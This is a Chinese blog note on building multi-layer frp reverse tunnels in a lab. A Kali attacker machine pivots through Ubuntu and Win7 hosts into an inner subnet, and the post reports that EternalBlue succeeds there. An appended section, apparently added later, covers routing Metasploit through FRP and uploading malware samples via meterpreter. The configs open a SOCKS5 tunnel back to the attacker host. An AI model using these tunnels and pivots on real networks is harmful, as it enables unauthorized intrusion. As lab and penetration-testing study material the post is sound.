frp多层代理配置(随笔)

攻击机:kali (192.168.111.130)

第一层:ubuntu(192.168.111.129)(192.168.183.128)

第二层:win7 (192.168.40.129)  (192.168.183.129)

第三层:win2008 (192.168.40.128)

搭第一层隧道:       

①先在攻击机上配置并开好代理:

frps.ini配置:

[common]
bind_port = 7000

启动代理

./frps -c frps.ini

看到success即为成功

②上传frpc和frpc.ini到ubuntu上,frpc.ini配置如下

server_addr = 192.168.111.130   #攻击机IP   
server_port = 7000         


[socks_proxy]
type=tcp
remote_port = 6000  
plugin = socks5

注意:搭好之后,攻击机的7000和6000端口都会开放,具体怎么使用代理参考上一篇文章

内网渗透相关(持续更新)-优快云博客

③目标启动代理

./frpc -c frpc.ini

到这里,第一层代理已经搭好,开始搭第二层:

①上传frps和frps.ini到ubuntu,也就是第一层的目标主机上,配置好并启动,参考配置如下:

端口随意设置

②ubuntu服务端启动好后,要来到win7,将frpc和frpc.ini上传后配置并启动,参考配置如下:

可以看出来,相比第一层,只是改了端口和ip。

至此,我们攻击机就可以通过proxychains直达192.168.40.0/24网段

proxychains具体配置如下:

6000端口对应第一层,9000则对应第二层。

用永恒之蓝尝试攻击192.168.40.0/24网段主机,可以成功

如果攻击机为windows的可以用proxifier做全局代理,具体方法看这位师傅的文章

frp多层内网隧道搭建 proxychains及proxyfier多层代理详细设置_proxifier多级代理-优快云博客

### 如何在 Metasploit 中配置 FRP 代理 #### 配置FRP服务器端(FRPS) 为了使Metasploit能够利用FRP作为代理,首先需要设置好FRP的服务端。按照给定的操作指南,在云主机上完成FRP的下载、解压缩以及基本配置[^3]。 ```bash wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz tar -zxvf frp_0.16.1_linux_amd64.tar.gz cd frp_0.16.1_linux_amd64/ vi frps.ini ./frps -c ./frps.ini ``` 确保`bind_port`参数被设定为一个合适的值,并且此端口已经在防火墙上开放以便允许外部访问。 #### 设置FRP客户端(FRPC) 接着是在本地机器或者其他远程节点部署FRP客户端来建立隧道至上述已搭建好的服务端。对于希望与Metasploit集成的情况来说,这意味着要创建一条通往目标网络内部资源的安全通道。 编辑`frpc.ini`文件以匹配服务端的相关设置并指定想要转发的具体应用或服务: ```ini [common] server_addr = x.x.x.x ; 替换成实际IP地址 server_port = 7000 ; 应同于服务端绑定端口 [tcp_proxy] type = tcp local_ip = 127.0.0.1 ; 如果是本机上的服务则保持不变 local_port = 80 ; 被保护的应用程序监听端口号 remote_port = 8080 ; 对外暴露的虚拟端口号 ``` 保存更改后的配置文件后运行命令启动FRPC实例: ```bash ./frpc -c ./frpc.ini ``` #### 整合Metasploit框架 现在有了通过FRP构建起来的数据传输路径之后就可以着手准备让Metasploit经由此途径实施攻击活动了。具体做法取决于所选用模块的要求;然而通常情况下只需调整那些涉及目标位置(`RHOSTS`)和通信端口(`RPORT`)选项即可实现间接操作远端资产的目的。 假设已经成功建立了从内网某台计算机到互联网可触及之处之间的稳定连接,则可以在msfconsole里加载相应的exploit/payload组件并将必要的参数指向由FRP所提供的映射关系之上——即使用公网可见的那个IP加上之前定义过的`remote_port`数值组合而成的新址代替原始的目标描述信息。 另外值得注意的是当涉及到文件交换需求时(比如上传恶意软件样本),可以借助Meterpreter会话中的标准指令集轻松达成目的,就像下面这样执行就能把位于Linux系统的ZIP包传送到Windows操作系统内的特定目录下了[^2]: ```ruby meterpreter > upload /path/to/local/file.zip C:\\destination\\folder\ ``` 当然这里提到的例子仅用于说明技术原理而非鼓励任何非法行为,请务必遵循法律法规合理运用这些知识技能!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值